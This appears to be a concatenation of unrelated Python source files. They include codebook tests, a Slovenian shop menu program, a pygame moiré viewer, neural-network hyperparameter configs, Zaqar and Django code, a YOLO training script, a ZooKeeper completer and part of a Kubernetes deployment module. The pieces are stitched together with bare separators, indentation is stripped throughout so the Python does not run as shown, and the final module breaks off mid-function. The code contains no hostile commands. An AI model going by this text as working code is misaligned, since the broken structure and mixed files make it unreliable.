def test_loading_codebook_with_too_few_dims_raises_value_error(simple_codebook_json):
with pytest.raises(ValueError):
Codebook.from_json(simple_codebook_json, n_ch=1, n_hyb=2)
with pytest.raises(ValueError):
Codebook.from_json(simple_codebook_json, n_ch=2, n_hyb=1)
def test_euclidean_decode_yields_correct_output(euclidean_decoded_intensities):
expected_gene_annotation = np.array(["ACTB", "SCUBE2", "BRCA"])
observed_gene_annotation = euclidean_decoded_intensities[
IntensityTable.Constants.GENE.value].values
assert np.array_equal(expected_gene_annotation, observed_gene_annotation)
def test_indexing_on_set_genes(euclidean_decoded_intensities):
# note that this kind of indexing produces an xarray-internal FutureWarning about float
# conversion that we can safely ignore here.
is_actin = euclidean_decoded_intensities[IntensityTable.Constants.GENE.value] == 'ACTB'
with warnings.catch_warnings():
warnings.simplefilter('ignore', FutureWarning)
# select only the intensities that are actin, drop the rest
result = euclidean_decoded_intensities.where(is_actin, drop=True)
assert result.shape == (1, 2, 2)
def test_synthetic_codes_are_on_only_once_per_channel(euclidean_decoded_intensities):
expected_gene_annotation = np.array(["ACTB", "SCUBE2", "BRCA"])
observed_gene_annotation = euclidean_decoded_intensities[
IntensityTable.Constants.GENE.value].values
assert np.array_equal(expected_gene_annotation, observed_gene_annotation)
def test_per_channel_max_decode_yields_expected_results(per_channel_max_decoded_intensities):
expected_gene_annotation = np.array(["ACTB", "SCUBE2", "BRCA"])
observed_gene_annotation = per_channel_max_decoded_intensities[
IntensityTable.Constants.GENE.value].values
assert np.array_equal(expected_gene_annotation, observed_gene_annotation)
def test_synthetic_one_hot_codes_produce_one_channel_per_hyb():
cb = Codebook.synthetic_one_hot_codebook(n_hyb=6, n_channel=4, n_codes=100)
# sum over channels: only one should be "on"
assert np.all(cb.sum(Indices.CH.value) == 1)
def test_codebook_save(loaded_codebook):
directory = tempfile.mkdtemp()
filename = os.path.join(directory, 'codebook.json')
loaded_codebook.to_json(filename)
reloaded = Codebook.from_json(filename, n_hyb=2, n_ch=2)
assert np.array_equal(loaded_codebook, reloaded)
assert np.array_equal(loaded_codebook[Indices.CH.value], reloaded[Indices.CH.value])
assert np.array_equal(loaded_codebook[Indices.HYB.value], reloaded[Indices.HYB.value])
assert np.array_equal(loaded_codebook[Codebook.Constants.GENE.value].values,
reloaded[Codebook.Constants.GENE.value].values)
@pytest.mark.parametrize('n_ch, n_hyb', ((2, 2), (5, 4)))
def test_loading_codebook_with_unused_channels_and_hybs(simple_codebook_json, n_ch, n_hyb):
cb = Codebook.from_json(simple_codebook_json, n_ch=n_ch, n_hyb=n_hyb)
assert cb.shape == (3, n_ch, n_hyb)
@pytest.mark.parametrize('n_ch, n_hyb', ((2, 2), (5, 4)))
def test_code_length(n_ch, n_hyb):
gene_names = np.arange(10)
cb = Codebook._empty_codebook(gene_names, n_ch, n_hyb)
assert cb.code_length == n_ch * n_hyb
|
import modeli
def izberi_moznost(moznosti):
"""
    Function that prints a list of options and returns the index of the chosen one.
    If no option is available, it prints a warning and returns None.
    If exactly one option is available, it returns 0.
>>> izberi_moznost(['jabolko', 'hruška', 'stol'])
1) jabolko
2) hruška
3) stol
Vnesite izbiro > 2
1
>>> izberi_moznost([])
>>> izberi_moznost(['jabolko'])
0
"""
if len(moznosti) == 0:
return
elif len(moznosti) == 1:
return 0
else:
for i, moznost in enumerate(moznosti, 1):
print('{}) {}'.format(i, moznost))
st_moznosti = len(moznosti)
while True:
izbira = input('Vnesite izbiro > ')
if not izbira.isdigit():
print('NAPAKA: vnesti morate število')
else:
n = int(izbira)
if 1 <= n <= st_moznosti:
return n - 1
else:
print('NAPAKA: vnesti morate število med 1 in {}!'.format(
st_moznosti))
# 1) Customer
def prikazi_podatke_kupcev():
id_kupca = izberi_kupca()
if id_kupca is None:
print('Noben kupec ne ustreza iskalnemu nizu.')
else:
ime, naslov, davcna_stevilka, kontaktna_oseba = modeli.podatki_kupca(id_kupca)
print(' {}'.format(ime))
print(' naslov: {}'.format(naslov))
print(' davcna stevilka: {}'.format(davcna_stevilka))
print(' kontaktna oseba: {}'.format(kontaktna_oseba))
def izberi_kupca():
niz = input('Vnesite del imena kupca > ')
idji_kupcev = modeli.poisci_kupca(niz)
moznosti = [
'{} ***{}***'.format(ime, naslov) for _, ime, naslov in modeli.podatki_kupcev(idji_kupcev)
]
izbira = izberi_moznost(moznosti)
return None if izbira is None else idji_kupcev[izbira]
# 2) Products
def prikazi_podatke_izdelkov():
id_izdelka = izberi_izdelek()
if id_izdelka is None:
print('Noben izdelek ne ustreza iskalnemu nizu.')
else:
opis, zaloga, cena, kategorija = modeli.podatki_izdelka(id_izdelka)
print(' {}'.format(opis))
print(' zaloga: {}'.format(zaloga))
print(' cena: {}'.format(cena))
print(' kategorija izdelka: {}'.format(kategorija[0]))
def izberi_izdelek():
niz = input('Poiščite svojo uro > ')
idji_izdelkov = modeli.poisci_izdelek(niz)
moznosti = [
'{} ---> {} EUR'.format(opis, cena) for _, opis, cena in modeli.podatki_izdelkov(idji_izdelkov)
]
izbira = izberi_moznost(moznosti)
return None if izbira is None else idji_izdelkov[izbira]
# 3) Orders
# TODO Implement to the end
#""" def prikazi_podatke_narocil():
# id_narocila = izberi_narocilo()
# if id_narocila is None:
# print('Nobeno narocilo ne ustreza iskalnemu nizu.')
#else:
# id_narocilo, datum, rok_placila, kupec, status, izdelki = modeli.podatki_narocila(id_narocila)
# print(' Stevilka narocila {}'.format(id_narocilo))
# print(' datum: {}'.format(datum))
#print(' rok placila: {}'.format(rok_placila))
#print(' kupec: {}'.format(kupec))
#print(' status placila: {}'.format(status))
#print(' Izdelki:')
#for izdelek in izdelki:
# print("**********************************************")
# print(' Naziv izdelka: {}'.format(izdelek[0])) # Naziv izdelka povlečen
# print(' Cena izdelka: {}'.format(izdelek[1])) # Naziv izdelka povlečen
#print(' Količina izdelka: {}'.format(izdelek[2])) # Naziv izdelka povlečen
#print(' Popust na izdelek: {}%'.format(izdelek[3]*100)) # Naziv izdelka povlečen
#def izberi_narocilo():
#niz = input('Vnesite datum naročila (format: dd/mm/yyyy) > ')
#idji_narocil = modeli.poisci_narocila(niz)
#moznosti = [
# 'številka naročila: {} Kupec: {}'.format(id_narocila, kupec) for id_narocila, kupec in modeli.podatki_narocil(idji_narocil)
#]
#izbira = izberi_moznost(moznosti)
#return None if izbira is None else idji_narocil[izbira]
#"""
def pokazi_moznosti():
print(50 * '-')
izbira = izberi_moznost([
'prikaži podatke kupca',
'prikaži podatke o izdelku',
#'prikaži podatke o narocilu',
# 'dodaj vlogo osebe v filmu',
#'prikaži najboljše filme posameznega desetletja',
#'dodaj film',
'izhod',
])
if izbira == 0:
prikazi_podatke_kupcev()
elif izbira == 1:
prikazi_podatke_izdelkov()
#elif izbira == 2:
# prikazi_podatke_narocil()
# elif izbira == 3:
# prikazi_najboljse_filme_desetletja()
# elif izbira == 4:
# dodaj_film()
else:
print('Nasvidenje!')
exit()
def main():
print('Pozdravljeni v trgovini ur!')
while True:
pokazi_moznosti()
main() |
import pygame
import pygame.freetype
import src.shared_constants as sc
KEYBOARD_MOVE_DISTANCE = 1
KEYBOARD_ROTATE_ANGLE = 0.1
class App:
def __init__(self, patterns, pattern_name):
pygame.init()
self.window = pygame.display.set_mode(sc.WINDOW_SIZE)
pygame.display.set_caption("Moiré")
self.clock = pygame.time.Clock()
pygame.key.set_repeat(500, 17)
self.patterns = patterns
self.pattern_name = pattern_name
self.pattern = self.patterns[pattern_name]()
self.pattern_names = sorted(list(patterns.keys()))
self.pattern_index = self.pattern_names.index(self.pattern_name)
self.pattern.draw(self.window)
self.window_center = pygame.Vector2(self.window.get_rect().center)
self.show_info = True
self.font = pygame.freetype.SysFont(("consolas", "inconsolata", "monospace"), 16)
self.font.fgcolor = pygame.Color((16, 16, 16))
self.font.bgcolor = pygame.Color((220, 220, 220))
self.line_spacing = pygame.Vector2(0, self.font.get_sized_height())
self.text_margin = pygame.Vector2(5, 5)
w, h = sc.WINDOW_SIZE
_, self.info_rect = self.font.render(
f" translation: -{w}, -{h} " # maximum string width
)
self.info_rect.height = self.text_margin.y * 2 + self.line_spacing.y * 3
self.info_rect.topleft = self.text_margin
self.info_surface = pygame.Surface(self.info_rect.size)
self.update_info()
def run(self):
movement_mouse = pygame.Vector2()
movement_keyboard = pygame.Vector2()
rotation_mouse = []
rotation_keyboard = 0
while True:
self.clock.tick(60)
draw_pattern = False
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
return
elif event.key == pygame.K_BACKSPACE:
self.pattern.reset()
draw_pattern = True
elif event.key == pygame.K_F1:
self.show_info = not self.show_info
draw_pattern = True
elif event.key == pygame.K_w:
movement_keyboard.y -= KEYBOARD_MOVE_DISTANCE
elif event.key == pygame.K_a:
movement_keyboard.x -= KEYBOARD_MOVE_DISTANCE
elif event.key == pygame.K_s:
movement_keyboard.y += KEYBOARD_MOVE_DISTANCE
elif event.key == pygame.K_d:
movement_keyboard.x += KEYBOARD_MOVE_DISTANCE
elif event.key == pygame.K_q:
rotation_keyboard += KEYBOARD_ROTATE_ANGLE
elif event.key == pygame.K_e:
rotation_keyboard -= KEYBOARD_ROTATE_ANGLE
elif event.key == pygame.K_n:
# Switch to next pattern
self.pattern_index = (self.pattern_index + 1) % len(self.pattern_names)
self.pattern_name = self.pattern_names[self.pattern_index]
self.pattern = self.patterns[self.pattern_name]()
draw_pattern = True
elif event.type == pygame.MOUSEMOTION and event.buttons[0]:
movement_mouse += event.rel
elif event.type == pygame.MOUSEMOTION and event.buttons[2]:
rotation_mouse.append(event)
if movement_mouse != (0, 0) or movement_keyboard != (0, 0):
self.pattern.move(movement_mouse + movement_keyboard)
movement_mouse.update(0, 0)
movement_keyboard.update(0, 0)
draw_pattern = True
if rotation_mouse or rotation_keyboard != 0:
self.pattern.rotate(rotation_mouse, rotation_keyboard)
rotation_mouse.clear()
rotation_keyboard = 0
draw_pattern = True
if draw_pattern:
self.pattern.draw(self.window)
self.update_info()
if self.show_info:
self.window.blit(self.info_surface, self.info_rect)
pygame.display.flip()
def update_info(self):
self.info_surface.fill(self.font.bgcolor)
pygame.draw.rect(
self.info_surface,
self.font.fgcolor,
self.info_surface.get_rect(),
1
)
self.font.render_to(
self.info_surface,
self.text_margin,
f"name: {self.pattern_name}"
)
translation = (self.pattern.foreground_center
/ sc.MAGNIFICATION
- self.window_center)
self.font.render_to(
self.info_surface,
self.text_margin + self.line_spacing,
f"translation: {translation.x:.0f}, {translation.y:.0f}"
)
self.font.render_to(
self.info_surface,
self.text_margin + self.line_spacing * 2,
f"angle: {self.pattern.angle:.1f}°"
)
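class _NullPattern:
    """Minimal sketch (hypothetical) of the interface App expects from a pattern.

    The real pattern classes live elsewhere; every name and default below is
    illustrative only. App calls draw(), move(), rotate() and reset(), and reads
    the foreground_center and angle attributes for the info overlay.
    """

    def __init__(self):
        self.foreground_center = pygame.Vector2(0, 0)
        self.angle = 0.0

    def reset(self):
        self.foreground_center.update(0, 0)
        self.angle = 0.0

    def move(self, offset):
        self.foreground_center += offset

    def rotate(self, mouse_events, keyboard_angle):
        self.angle += keyboard_angle

    def draw(self, surface):
        surface.fill((255, 255, 255))


# Example wiring (illustrative): App({"null": _NullPattern}, "null").run()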
|
config_DMLPDTP2_linear = {
'lr': 8.703567590317672e-06,
'target_stepsize': 0.017250397502053975,
'beta1': 0.99,
'beta2': 0.99,
'epsilon': 1.727973356862063e-08,
'lr_fb': 0.0007959054461775743,
'sigma': 0.09857259200102354,
'feedback_wd': 5.782689838884453e-06,
'beta1_fb': 0.99,
'beta2_fb': 0.9,
'epsilon_fb': 3.1081662356907766e-08,
'out_dir': 'logs/mnist/DMLPDTP2_linear',
'network_type': 'DMLPDTP2',
'recurrent_input': False,
'hidden_fb_activation': 'linear',
'size_mlp_fb': None,
'fb_activation': 'linear',
'initialization': 'xavier_normal',
'extra_fb_epochs': 1,
'epochs_fb': 6,
'gn_damping': [1.,1.,1.,1.,0.],
}
config_BP = {
'lr': 0.000287604813302375,
'beta1': 0.9,
'beta2': 0.99,
'epsilon': 4.7253263377092954e-08,
'out_dir': 'logs/fashion_mnist/BP',
'network_type': 'BP',
'initialization': 'xavier_normal',
'target_stepsize': 1.0,
'extra_fb_epochs': 0,
'epochs_fb': 0,
}
config_DTP_improved = {
'lr': 9.182096556021097e-06,
'target_stepsize': 0.038390892689968543,
'feedback_wd': 0.00043410554677483223,
'beta1': 0.99,
'beta2': 0.9,
'epsilon': 5.0647473988637e-08,
'lr_fb': 0.00023284386425380716,
'sigma': 0.2994857084510052,
'beta1_fb': 0.99,
'beta2_fb': 0.99,
'epsilon_fb': 2.4338150947778934e-08,
'out_dir': 'logs/fashion_mnist/DTP',
'network_type': 'DTP',
'initialization': 'xavier_normal',
'fb_activation': 'tanh',
'extra_fb_epochs': 1,
'epochs_fb': 6,
'gn_damping': [1.,1.,1.,1.,1.],
}
config_DKDTP2 = {
'lr': 3.5732235846702084e-06,
'target_stepsize': 0.015455634153961095,
'beta1': 0.9,
'beta2': 0.99,
'epsilon': 1.2701003983026873e-08,
'lr_fb': 6.880092987934033e-06,
'sigma': 0.04388002579623536,
'feedback_wd': 5.558397978753893e-05,
'beta1_fb': 0.999,
'beta2_fb': 0.999,
'epsilon_fb': 0.00015552792707179634,
'out_dir': 'logs/mnist/DKDTP2',
'network_type': 'DKDTP2',
'recurrent_input': False,
'hidden_fb_activation': 'tanh',
'fb_activation': 'tanh',
'initialization': 'xavier_normal',
'size_hidden_fb': 1024,
'extra_fb_epochs': 1,
'epochs_fb': 6,
'gn_damping': [1.,1.,1.,1.,0.001],
}
config_DFA = {
'lr': 0.0009403014926576205,
'beta1': 0.9,
'beta2': 0.99,
'epsilon': 3.661109295012624e-08,
'out_dir': 'logs/fashion_mnist/DFA',
'network_type': 'DFA',
'fb_activation': 'linear',
'initialization': 'xavier_normal',
'target_stepsize': 1.0,
'extra_fb_epochs': 0,
'epochs_fb': 0,
'gn_damping': [10.,1.,1.,10.,1.],
}
config_DTPDR = {
'lr': 7.101735983180753e-05,
'target_stepsize': 0.08656715666379391,
'feedback_wd': 2.138772519002704e-05,
'beta1': 0.99,
'beta2': 0.999,
'epsilon': 1.6407278251505892e-08,
'lr_fb': 9.698300934344597e-05,
'sigma': 0.08433329930575183,
'beta1_fb': 0.99,
'beta2_fb': 0.9,
'epsilon_fb': 2.267582036430733e-05,
'out_dir': 'logs/fashion_mnist/DTPDR_nonseq',
'network_type': 'DTPDR',
'initialization': 'xavier_normal',
'fb_activation': 'tanh',
'extra_fb_epochs': 1,
'epochs_fb': 6,
'gn_damping': [1.,1.,1.,1.,0.01],
}
config_DTP = {
'lr': 6.264712908427562e-05,
'target_stepsize': 0.24133669284943418,
'beta1': 0.9,
'beta2': 0.99,
'epsilon': 3.175105564611512e-08,
'lr_fb': 0.00036600402073155754,
'sigma': 0.26748740970595125,
'beta1_fb': 0.99,
'beta2_fb': 0.999,
'epsilon_fb': 1.3606678094184999e-06,
'out_dir': 'logs/fashion_mnist/DTP',
'network_type': 'DTP',
'initialization': 'xavier_normal',
'feedback_wd': 0,
'fb_activation': 'tanh',
'extra_fb_epochs': 0,
'epochs_fb': 0,
'gn_damping': [10.,10.,10.,10.,10.],
}
config_DKDTP2_extrafb = {
'lr': 3.171519855395423e-05,
'target_stepsize': 0.05598874122443612,
'beta1': 0.9,
'beta2': 0.99,
'epsilon': 2.0138675396073716e-08,
'lr_fb': 1.578529455711729e-05,
'sigma': 0.0862694472920603,
'feedback_wd': 0.000766250333918441,
'beta1_fb': 0.99,
'beta2_fb': 0.99,
'epsilon_fb': 5.246940731788602e-07,
'out_dir': 'logs/fashion_mnist/DKDTP2',
'network_type': 'DKDTP2',
'recurrent_input': False,
'hidden_fb_activation': 'tanh',
'fb_activation': 'tanh',
'initialization': 'xavier_normal',
'size_hidden_fb': 1024,
'extra_fb_epochs': 4,
'epochs_fb': 10,
'gn_damping': [1.,1.,1.,1.,0.001],
}
config_DKDTP2_rec_extrafb = {
'lr': 6.3790630374119055e-06,
'target_stepsize': 0.08410816705027833,
'beta1': 0.9,
'beta2': 0.9,
'epsilon': 1.0627279807937555e-08,
'lr_fb': 5.275331141492459e-05,
'sigma': 0.06531861405669062,
'feedback_wd': 0.00017016700163704547,
'beta1_fb': 0.99,
'beta2_fb': 0.99,
'epsilon_fb': 4.87297459975216e-07,
'out_dir': 'logs/fashion_mnist/DKDTP2',
'network_type': 'DKDTP2',
'recurrent_input': True,
'hidden_fb_activation': 'tanh',
'fb_activation': 'tanh',
'initialization': 'xavier_normal',
'size_hidden_fb': 1024,
'extra_fb_epochs': 4,
'epochs_fb': 10,
'gn_damping': [0.1,0.1,0.1,0.1,0.0001],
}
config_DDTPControl = {
'lr': 3.0076918366526155e-05,
'target_stepsize': 0.032346424994794266,
'beta1': 0.9,
'beta2': 0.999,
'epsilon': 1.3274012105519261e-08,
'lr_fb': 3.12062953559089e-05,
'sigma': 0.08486912067649759,
'feedback_wd': 1.1893046560968361e-06,
'beta1_fb': 0.999,
'beta2_fb': 0.99,
'epsilon_fb': 0.00032568051410950655,
'out_dir': 'logs/fashion_mnist/DDTPControl',
'network_type': 'DDTPControl',
'recurrent_input': False,
'hidden_fb_activation': 'linear',
'size_mlp_fb': None,
'fb_activation': 'linear',
'initialization': 'xavier_normal',
'extra_fb_epochs': 1,
'epochs_fb': 6,
'gn_damping': [10.,1.,1.,10.,10.],
}
config_collection = {
'DTPDRL': config_DTPDR,
'DDTP-linear': config_DMLPDTP2_linear,
'DDTP-RHL': config_DKDTP2,
'DDTP-RHL(extra fb)': config_DKDTP2_extrafb,
'DDTP-RHL(rec+extra fb)': config_DKDTP2_rec_extrafb,
'DTP': config_DTP,
'DTP (pretrained)': config_DTP_improved,
'DDTP-control': config_DDTPControl,
'DFA': config_DFA,
'BP': config_BP,
}
result_keys = [
'loss_train',
'loss_test',
'loss_val',
'acc_train',
'acc_test',
'acc_val',
'bp_angles',
'gnt_angles',
'rec_loss',
]
config_fixed = {
'dataset': 'fashion_mnist',
'optimizer': 'Adam',
'optimizer_fb': 'Adam',
'momentum': 0.0,
'parallel': True,
'normalize_lr': True,
'batch_size': 128,
'forward_wd': 0.0,
'not_randomized': True,
'not_randomized_fb': True,
'extra_fb_minibatches': 0,
'epochs': 100,
'train_only_feedback_parameters': False,
'num_hidden': 5,
'size_hidden': 256,
'size_input': 784,
'size_output': 10,
'hidden_activation': 'tanh',
'output_activation': 'softmax',
'no_bias': False,
'no_cuda': False,
'random_seed': 42,
'cuda_deterministic': False,
'freeze_BPlayers': False,
'multiple_hpsearch': False,
'save_logs': True,
'save_BP_angle': True,
'save_GN_angle': False,
'save_GNT_angle': True,
'save_GN_activations_angle': False,
'save_BP_activations_angle': False,
'hpsearch': False,
'plots': 'compute',
'log_interval': 80,
}
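# Minimal sketch (an assumption, not taken from the original training code) of how
# these dictionaries are typically combined: the shared settings in `config_fixed`
# are overlaid with one algorithm-specific entry from `config_collection`.
def build_config(name):
    """Return the full hyperparameter dict for the given config_collection key."""
    config = dict(config_fixed)
    config.update(config_collection[name])
    return config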
if __name__ == '__main__':
pass |
# Copyright (c) 2013 Rackspace, Inc.
# Copyright (c) 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from zaqar.common import decorators
class Request(object):
"""General data for a Zaqar request
    Transport will generate a request object and send it to the API to be
    processed.
:param action: Action to identify the API call being processed,
i.e: 'get_queues', 'get_messages'
:type action: str
:param body: Request's body. Default: None
:type body: str
:param headers: Request headers. Default: None
:type headers: dict
:param api: Api entry point. i.e: 'queues.v1'
:type api: `six.text_type`.
"""
def __init__(self, action,
body=None, headers=None, api=None):
self._action = action
self._body = body
self._headers = headers or {}
self._api = api
@decorators.lazy_property()
def deserialized_content(self):
if self._body is not None:
return json.loads(self._body)
return None
def get_request(self):
return {'action': self._action,
'body': self._body,
'headers': self._headers,
'api': self._api}
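if __name__ == "__main__":  # pragma: no cover
    # Tiny usage sketch, illustrative only: the action, body and api values
    # below are placeholders.
    req = Request('get_queues', body='{"limit": 10}', api='queues.v1')
    print(req.get_request())
    print(req.deserialized_content)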
|
from django.shortcuts import render
from .models import City
from django.views.generic import DetailView
from django.views.generic.edit import CreateView, UpdateView, DeleteView
from .forms import CityForm
from django.urls import reverse_lazy
from django.core.paginator import Paginator
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib import messages
# Create your views here.
def home(request):
# if request.method == 'POST':
# form = CityForm(request.POST or None)
# if form .is_valid():
# print(form.cleaned_data)
# form = CityForm()
# cities = City.objects.all()
cities = City.objects.all()
paginator = Paginator(cities, 25)
page = request.GET.get("page")
cities = paginator.get_page(page)
return render(request, "cities/home.html", {"objects_list": cities})
# return render(request, 'cities/home.html',
# {'objects_list': cities, 'form': form})
class CityDetailView(DetailView):
queryset = City.objects.all()
context_object_name = "object"
template_name = "cities/detail.html"
class CityCreateView(SuccessMessageMixin, CreateView):
model = City
form_class = CityForm
template_name = "cities/create.html"
success_url = reverse_lazy("city:home")
success_message = "City successfully created!"
class CityUpdateView(SuccessMessageMixin, UpdateView):
model = City
form_class = CityForm
template_name = "cities/update.html"
success_url = reverse_lazy("city:home")
success_message = "City successfully updated!"
class CityDeleteView(DeleteView):
model = City
# template_name = 'cities/delete.html'
success_url = reverse_lazy("city:home")
def get(self, request, *args, **kwargs):
messages.success(request, "City successfully deleted!")
return self.post(request, *args, **kwargs)
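# A matching urls.py sketch (hypothetical, not part of this views module). The
# app_name "city" mirrors the "city:home" success URLs above; the route paths and
# names below are illustrative only.
#
#   from django.urls import path
#   from . import views
#
#   app_name = "city"
#
#   urlpatterns = [
#       path("", views.home, name="home"),
#       path("detail/<int:pk>/", views.CityDetailView.as_view(), name="detail"),
#       path("create/", views.CityCreateView.as_view(), name="create"),
#       path("update/<int:pk>/", views.CityUpdateView.as_view(), name="update"),
#       path("delete/<int:pk>/", views.CityDeleteView.as_view(), name="delete"),
#   ]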
|
import json
import logging
import os
from lib_yolo import yolov3, train, utils
def main():
config = {
'training': True, # edit
'resume_training': False, # edit
        'resume_checkpoint': 'last',  # edit: either a checkpoint filename or 'last' to resume the most recent training
'priors': yolov3.ECP_9_PRIORS, # edit if not ECP dataset
'run_id': 'yolo',
'checkpoint_path': './checkpoints',
'tensorboard_path': './tensorboard',
'log_path': './log',
'ckp_max_to_keep': 102,
'checkpoint_interval': 5000,
'ign_thresh': 0.7,
'crop_img_size': [768, 1440, 3],
'full_img_size': [1024, 1920, 3], # edit if not ECP dataset
'train_steps': 500000,
'darknet53_weights': './darknet53.conv.74',
'batch_size': 8, # edit
'lr': 1e-5,
'cpu_thread_cnt': 24, # edit
'crop': True, # edit, random crops and rescaling reduces memory consumption and improves training
'freeze_darknet53': True, # if True the basenet weights are frozen during training
'aleatoric_loss': False,
'cls_cnt': 2, # edit if not ECP dataset
'implicit_background_class': True, # whether the label ids start at 1 or 0. True = 1, False = 0
'train': {
'file_pattern': os.path.expandvars('$HOME/data/ecp/tfrecords/ecp-day-train-*-of-*'), # edit
'num_shards': 20,
'shuffle_buffer_size': 2000,
'cache': False, # edit if you have enough memory, caches whole dataset in memory
},
'val': {
'file_pattern': os.path.expandvars('$HOME/data/ecp/tfrecords/ecp-day-val-*-of-*'), # edit
'num_shards': 4,
'shuffle_buffer_size': 10,
'cache': False, # edit if you have enough memory, caches whole dataset in memory
}
}
# Note regarding implicit background class:
# The tensorflow object detection API enforces that the class labels start with 1.
# The class 0 is reserved for an (implicit) background class. We support both file formats.
utils.add_file_logging(config, override_existing=True)
logging.info(json.dumps(config, indent=4, default=lambda x: str(x)))
model_cls = yolov3.yolov3
if config['training']:
train.start(model_cls, config)
else:
config['thresh'] = 0.01 # filter out boxes with objectness score less than thresh
utils.qualitative_eval(model_cls, config)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO,
format='%(asctime)s, %(levelname)-8s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',
)
main()
|
import kazoo
from prompt_toolkit.completion import Completer, Completion
from .lexer import KEYWORDS, ZK_FOUR_LETTER_WORDS
class ZkCompleter(Completer):
def __init__(self, zkcli, *args, **kwargs):
super().__init__(*args, **kwargs)
self.zkcli = zkcli
self.command = None
self.prev_typed_word = None
self.cache = {}
def _completions(self, complete_from, word_before_cursor):
completions = [cmd for cmd in complete_from if cmd.startswith(word_before_cursor)]
for completion in completions:
yield Completion(completion, -len(word_before_cursor))
def get_completions(self, document, complete_event):
"""The completions are either commands or paths"""
word_before_cursor = document.get_word_before_cursor(WORD=True)
# If command has been typed, store it
if (
not self.command and
self.prev_typed_word in KEYWORDS and
word_before_cursor == ''
):
self.command = document.text.strip()
# Find all possible completable commands
self.prev_typed_word = word_before_cursor
if self.command is None:
yield from self._completions(KEYWORDS, word_before_cursor)
elif self.command == "raw":
yield from self._completions(ZK_FOUR_LETTER_WORDS, word_before_cursor)
else:
# Autocomplete on the path of available znodes
path = word_before_cursor
if path.startswith('/'):
current_chroot = '/'.join(path.split('/')[:-1]).rstrip('/') or '/'
current_node = path.replace(current_chroot, '').lstrip('/')
if current_chroot not in self.cache:
try:
self.cache[current_chroot] = self.zkcli.get_children(current_chroot)
except kazoo.exceptions.NoNodeError:
# We may be typing a nonexistent path
# (for example with the 'create' command)
self.cache[current_chroot] = []
completions = [
'/%s' % (node)
for node in self.cache[current_chroot]
if node.startswith(current_node)
]
for completion in completions:
yield Completion(completion, -(len(current_node) + 1))
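if __name__ == "__main__":  # pragma: no cover
    # Minimal wiring sketch (hypothetical): plug the completer into a
    # prompt_toolkit session backed by a kazoo client. Host and prompt text
    # are placeholders.
    from kazoo.client import KazooClient
    from prompt_toolkit import PromptSession

    zk = KazooClient(hosts="127.0.0.1:2181")
    zk.start()
    session = PromptSession(completer=ZkCompleter(zk))
    print(session.prompt("zk> "))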
|
"""
deploy cluster service to kubernetes via the API server
"""
import base64
from datetime import datetime, timedelta
import getpass
import logging
import os
import random
import re
import socket
import string
import subprocess as sp
import sys
import urllib3
from pkg_resources import resource_filename, Requirement
from netaddr import valid_ipv4
from kubernetes import client as k8sclient
from kubernetes.stream import stream
from kubernetes.client import api_client
from kubernetes.client.configuration import Configuration
from kubernetes.client.rest import ApiException
from kubernetes.config import kube_config
from kubernetes.utils import create_from_yaml
import yaml
from koris.ssl import read_cert
from koris.ssl import discovery_hash as ssl_discovery_hash
from koris.util.util import retry
from koris.util.logger import Logger
from koris import MASTER_LISTENER_NAME
if getattr(sys, 'frozen', False):
MANIFESTSPATH = os.path.join(
sys._MEIPASS, # pylint: disable=no-member, protected-access
'deploy/manifests')
else:
MANIFESTSPATH = resource_filename(Requirement.parse("koris"),
'koris/deploy/manifests')
LOGGER = Logger(__name__)
ETCDCTL_BASE = ("ETCDCTL_API=3 etcdctl "
"--key /etc/kubernetes/pki/etcd/server.key "
"--cacert /etc/kubernetes/pki/etcd/ca.crt "
"--cert /etc/kubernetes/pki/etcd/server.crt "
"{} --endpoints=https://{}:2379 -w json")
def _get_node_addr(addresses, addr_type):
"""
Parse the address of the node
Args:
addresses (object) - instance of addresses returned from k8s API
addr_type (str) - the address type
"""
return [i.address for i in addresses if i.type == addr_type][0]
def rand_string(num):
"""
generate a random string of len num
"""
return ''.join([
random.choice(string.ascii_letters.lower() + string.digits)
for n in range(num)])
def get_token_description():
"""create a description for the token"""
description = "Bootstrap token generated by 'koris add' from {} on {}"
return description.format('%s@%s' % (getpass.getuser(), socket.gethostname()),
datetime.now())
def parse_etcd_response(resp):
"""Takes a response from etcdctl and parses it for its member info.
The response is to be expected in JSON format as obtained by
``etcdctl member list -w json``. Right now, the IDs in the JSON
response are in uint64 format and will be transformed into hex
with this function.
Args:
resp (str): A JSON response from etcdctl.
Returns:
A dict containing member information.
Raises:
ValueError if state could not be extracted.
"""
    if not resp:
        raise ValueError("etcdctl response is empty")
    if not re.search("master-\\d+", resp):
        LOGGER.debug(resp)
        raise ValueError("can't find 'master' in etcdctl response")
# Reconstructing the response so we get a dict where the key is the
# member name and and value is a dict with the other info.
out = {}
    resp_yaml = yaml.safe_load(resp)
for mem in resp_yaml['members']:
if 'name' in mem:
out[mem['name']] = {k: v for k, v in mem.items() if k != "name"}
# ID is uint64, but we need it in hex
out[mem['name']]['ID'] = hex(out[mem['name']]['ID'])[2:]
return out
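# Illustrative example of the transformation performed by parse_etcd_response();
# the JSON below is made up but shaped like the etcdctl output documented in
# etcd_cluster_status() further down.
#
#   >>> resp = ('{"members": [{"ID": 9007573287841766007, "name": "master-1", '
#   ...         '"peerURLs": ["https://10.32.192.11:2380"], '
#   ...         '"clientURLs": ["https://10.32.192.11:2379"]}]}')
#   >>> sorted(parse_etcd_response(resp)["master-1"])
#   ['ID', 'clientURLs', 'peerURLs']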
class K8SConfigurator: # pylint: disable=no-member
"""apply plugins and post install setup"""
def apply_plugins(self, plugins):
"""apply all plugins in the list"""
def get_bootstrap_token(self):
"""Generate a Bootstrap token
Returns:
A string of the form ``<token id>.<token secret>``.
"""
tid = rand_string(6)
token_secret = rand_string(16)
data = {'description': get_token_description(),
'token-id': tid,
'token-secret': token_secret,
'expiration':
datetime.strftime(datetime.now() + timedelta(hours=2),
"%Y-%m-%dT%H:%M:%SZ"),
'usage-bootstrap-authentication': 'true',
'usage-bootstrap-signing': 'true',
'auth-extra-groups':
'system:bootstrappers:kubeadm:default-node-token', }
